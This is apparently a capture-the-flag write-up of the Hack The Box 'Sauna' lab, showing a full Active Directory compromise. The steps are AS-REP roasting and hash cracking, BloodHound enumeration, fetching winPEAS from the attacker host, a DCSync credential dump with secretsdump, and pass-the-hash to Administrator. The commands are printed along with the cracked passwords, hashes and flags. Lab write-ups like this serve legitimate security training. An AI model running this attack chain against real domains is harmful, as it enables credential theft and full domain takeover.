> For the complete documentation index, see [llms.txt](https://vinetsuicide.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://vinetsuicide.gitbook.io/writeups/windows/easy-boxes/sauna.md).

# Sauna

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FQbM5RcbStDEjivL5j7sr%2FSauna.png?alt=media&amp;token=06787dea-fc56-4f46-a927-869dd6adff36" alt="" width="563"><figcaption></figcaption></figure>

### Recon

```bash
ping -c 1 10.10.10.175
PING 10.10.10.175 (10.10.10.175) 56(84) bytes of data.
64 bytes from 10.10.10.175: icmp_seq=1 ttl=127 time=63.7 ms

--- 10.10.10.175 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 63.726/63.726/63.726/0.000 ms
```

Because of TTL we can say that OS is Windows.

Lets start scanning.

```bash
sudo nmap -sC -sV 10.10.10.175 -Pn -p- -T5 -oN sauna 
```

```bash
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-13 03:06:01Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49732/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s
| smb2-time: 
|   date: 2024-02-13T03:06:56
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 412.66 seconds
```

### HTTP

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FgcuWifFvvEHEdEj0zH97%2FPasted%20image%2020240212230801.png?alt=media&amp;token=fdb533f7-1bdd-496c-b803-4a409eaeaaa5" alt="" width="563"><figcaption></figcaption></figure>

Nothing interesting, even after fuzzing. But there a couple of employers name.

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FBj9MWKemTXvNVBUY9Ntp%2FPasted%20image%2020240212230819.png?alt=media&amp;token=b1f45817-518c-41f5-b023-09fdf9264369" alt="" width="563"><figcaption></figcaption></figure>

I will create a list of employers, and Im going to mutate this list with tool username-anarchy.

{% embed url="<https://github.com/urbanadventurer/username-anarchy>" %}

```bash
./username-anarchy -i users f.last,flast,first.last > /home/musor/wu/Sauna/users.lst
```

### fsmith User

And will try kerberoasting attack.

```bash
GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.10.10.175 -dc-host egotistical-bank.local -no-pass -usersfile users.lst  
```

```bash
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:e368c4982fb42a508963e9532ee4d1da$291dfd06********
```

And now I can try to crack it.

```bash
hashcat hash /usr/share/wordlists/rockyou.txt
```

```bash
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:54150e25c664c2726e97e880287dbf72$8e25fa47d9adff6988cc198d140aa85855d058298a0bee4d94b69b4cf1b354dba7f492e7f737664316c1f4047ee852439eb1e1c87e066ba5bfb7589891ec6debc9df867ccb26ceb2488354e4d76c5db39168e348b5899de9a16f7e0f5a21e1bf5189c152ebf6c943fa160ac4db0482543532cc3e54479067cd09a9e55f6e80d6818bc1b624c4030d0098236010ecce444aff3d102348edb86be85397892010166af5d23d0de749cc6b4b8c02cbd407141bbcbf91374352778d8663d85b643e590c9c56343cef7388a4edd0bc983970fd6c3a325408b53c9b41f2470e23cab62fea4db99163e237819dd3c3cb30fe4dda624f23b0e57591bf39d0105c8a0dbaf5:Thestrokes23

```

Password is "Thestrokes23"

```bash
nxc smb 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
```

And credentials are valid.

After getting valid credentials Im always executing a bloodhound to investigate a target. Im going do it remotely with Python.

```bash
bloodhound-python -ns 10.10.10.175 -d egotistical-bank.local -u fsmith -p Thestrokes23 -c all                                                                                                                         
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (SAUNA.EGOTISTICAL-BANK.LOCAL:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 19S
```

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2F2HKaGPLLP5FNy8REKC3G%2FPasted%20image%2020240212232710.png?alt=media&amp;token=9e8d9e0f-849c-4c7f-9b18-bab33e74e205" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FXGcfztqqOA2F7wOJb9Ay%2FPasted%20image%2020240212232934.png?alt=media&amp;token=0b280363-88a7-4056-85b6-f84e4edac38b" alt=""><figcaption></figcaption></figure>

so user "svc\_loanmgr" have DCSyncs rights, but still we need to find credentials for it.

### svc\_loanmgr User

So lets try winrm to it.

```bash
nxc winrm 10.10.10.175 -u fsmith -p Thestrokes23                                                                                                                                                                      
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM       10.10.10.175    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)
```

We have rights to do it.

```bash
 evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
```

```bash
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/12/2024   7:00 PM             34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
bcf2503fb1eaab50e1a80d33ce8b7712
```

Im going to upload a winPEAS and execute it.

```bash
iwr -uri http://10.10.16.2/winpeas.exe -OutFile winpeas.exe
```

And something interesting.

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FXAzLdEzcAyBYpSCdCVbn%2FPasted%20image%2020240212232725.png?alt=media&amp;token=9b74c378-48ce-41bb-80af-823b4250e377" alt=""><figcaption></figcaption></figure>

```bash
nxc winrm 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'                                                                                                                                                 
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM       10.10.10.175    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)
```

### Privilege Escalation

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FXGcfztqqOA2F7wOJb9Ay%2FPasted%20image%2020240212232934.png?alt=media&amp;token=0b280363-88a7-4056-85b6-f84e4edac38b" alt="" width="443"><figcaption></figcaption></figure>

And it is working, so now this user have DCSyncs rights to dump everything.

Im going to dump everything remotely with impacket-secretsdump.

```bash
secretsdump.py egotistical-bank.local/svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175
Impacket v0.11.0 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:4195d6f62cc3ebc423f227660e00308d:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:6f611377d67ab0ce0b60c1eacf5afb892c1ef707442f0bef79b6c991f117eb02
SAUNA$:aes128-cts-hmac-sha1-96:d1a5fbd265a79efc54313a656bf9e9a9
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up... 
```

Using Administrator NTLM hash, we can try to login.

```bash
nxc winrm 10.10.10.175 -u administrator -H 823452073d75b9d1cf70ebdf86c7f98e                                                                                                                                           
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM       10.10.10.175    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\administrator:823452073d75b9d1cf70ebdf86c7f98e (Pwn3d!)
```

And boom, we have access.

Since there are winrm open, I wont use psexec.

<pre class="language-bash"><code class="lang-bash"><strong>evil-winrm -i 10.10.10.175 -u administrator -H 823452073d75b9d1cf70ebdf86c7f98e  
</strong></code></pre>

```bash
*Evil-WinRM* PS C:\Users\Administrator\Desktop>dir      


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/12/2024   7:00 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
50fcd969f1e223934cd3ceba70ff7dae
```

root.txt
